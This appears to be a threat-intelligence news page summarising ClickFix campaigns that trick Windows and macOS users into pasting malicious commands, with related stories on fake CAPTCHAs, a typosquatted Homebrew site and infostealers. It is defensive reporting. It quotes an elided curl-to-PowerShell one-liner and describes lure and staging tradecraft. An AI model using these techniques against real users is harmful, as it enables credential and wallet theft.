ClickFix Social-Engineering Lures Deliver Multi-Stage Windows Malware via Browser Extensions and Compromised WordPress Sites
Threat researchers reported continued evolution and operationalization of ClickFix-style social engineering, where victims are tricked into manually executing attacker-supplied commands via the Windows Run dialog. Huntress described a new variant dubbed CrashFix, attributed to KongTuke, which uses a malicious browser extension to display a fake “browser stopped abnormally” security warning and a bogus “scan” flow; the extension silently places a PowerShell command on the clipboard, disguised as a legitimate repair action, and instructs the user to paste-and-run it, leading to code execution.
Rapid7 Labs separately documented a large-scale campaign in which an unidentified actor compromises legitimate WordPress sites to inject a ClickFix implant that impersonates a Cloudflare human verification (CAPTCHA) challenge. The operation has affected 250+ infected sites across 12+ countries and delivers a multi-stage, mostly in-memory malware chain (obfuscated JavaScript → PowerShell stagers → in-memory loaders/shellcode) aimed at stealing credentials and digital wallets from Windows systems, enabling downstream financial theft and potential follow-on intrusion using harvested credentials.
Sources
Related Stories
ClickFix Social-Engineering Campaigns Using Compromised WordPress Sites and DNS-Based Staging
Threat actors are scaling **ClickFix**-style “self-infection” attacks that abuse compromised legitimate websites to trick users into manually executing malicious PowerShell via the Windows Run dialog or a terminal. Reporting describes the **KongTuke** campaign evolving its tradecraft by retrieving next-stage instructions from **DNS TXT records** rather than over HTTP, reducing visibility for controls focused on web traffic and blending activity into normal DNS resolution. The objective is follow-on malware deployment and persistence, including installation of remote-access tooling such as the **Interlock RAT**. Separately, researchers described a large **watering-hole** operation dubbed **IClickFix** that poisoned **3,800+ WordPress sites** with a fake *Cloudflare Turnstile CAPTCHA* prompt that instructs visitors to copy/paste and run a “fix” command. Once executed, the staged PowerShell pulls commodity payloads including **NetSupport RAT**, **Emmenhtal Loader**, and **XFiles Stealer**, and uses tracking/targeting logic (e.g., an `ic-tracker-js` HTML tag) to manage victim flow. In contrast, a different WordPress compromise technique called **“directory shadowing”** was reported as an SEO-spam operation that creates physical folders matching WordPress permalinks and serves gambling content selectively to crawlers (via User-Agent checks), which is not part of the ClickFix execution chain.
1 months ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.
4 weeks ago